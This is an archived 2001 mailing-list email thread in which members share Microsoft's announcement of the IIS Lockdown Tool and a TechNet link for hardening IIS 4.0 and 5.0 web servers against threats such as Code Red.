RE: [RE: [RE: Any leads?]]

From: victoria.evans@private
Date: Fri Sep 21 2001 - 15:47:48 PDT

    Here it is....

    IIS Lockdown Tool

      Microsoft has released a new security tool that makes it simple to secure
    an IIS 4.0
      or 5.0 web server. The tool, known as the IIS Lockdown Tool, allows web
    servers to
      quickly and easily be put into the right configuration ? in which the
    server provides all
      of the services the administrator wants to provide, and no others.
    Customers can
      use this tool to instantly protect their systems against security threats
    that target
      web servers.

      The tool offers two operating modes. The default is Express Lockdown
    which, with a
      single mouse click, configures the server in a highly secure way that is
    appropriate
      for most basic web servers. For administrators who want to pick and
    choose the
      technologies that will be enabled on the server, the tool offers an
      Lockdown mode. A comprehensive help system provides information and
      recommendations for selecting the best configuration, and an undo
    facility allows the
      most recent lockdown to be reversed.

      Wondering whether it's worth the time to use the tool? Consider this: a
    web server
      configured using the Express Lockdown would be completely protected
    against Code
      Red and virtually all known security vulnerabilities affecting IIS 4.0
    and 5.0 ? even
      without the patches for these vulnerabilities. We do, of course,
    recommend that all
      customers, even those running locked-down servers, continue to stay
    current on all
      security patches, but this vividly illustrates the value of the tool.

      The tool is available for downloading at
      http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362

                        dldean@private
                        Sent by:                                  To:     "J.Michael Cuciti" <mcuciti@private>, "Kuo Jimmy"
                        owner-crime@/var/spool/majordomo/l        <Jimmy_Kuo@private>
                        ists/crime                                cc:     crime@private
                                                                  Subject:     RE: [RE: [RE: Any leads?]]

                        09/21/2001 02:46 PM

    Mike,

    Here is a good starting place

    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio

    This link is for a Microsoft TechNet page describing security issue for web
    sites. They also have a "batten down the hatches" script for IIS but I
    cannot find the url for that page.

    Doug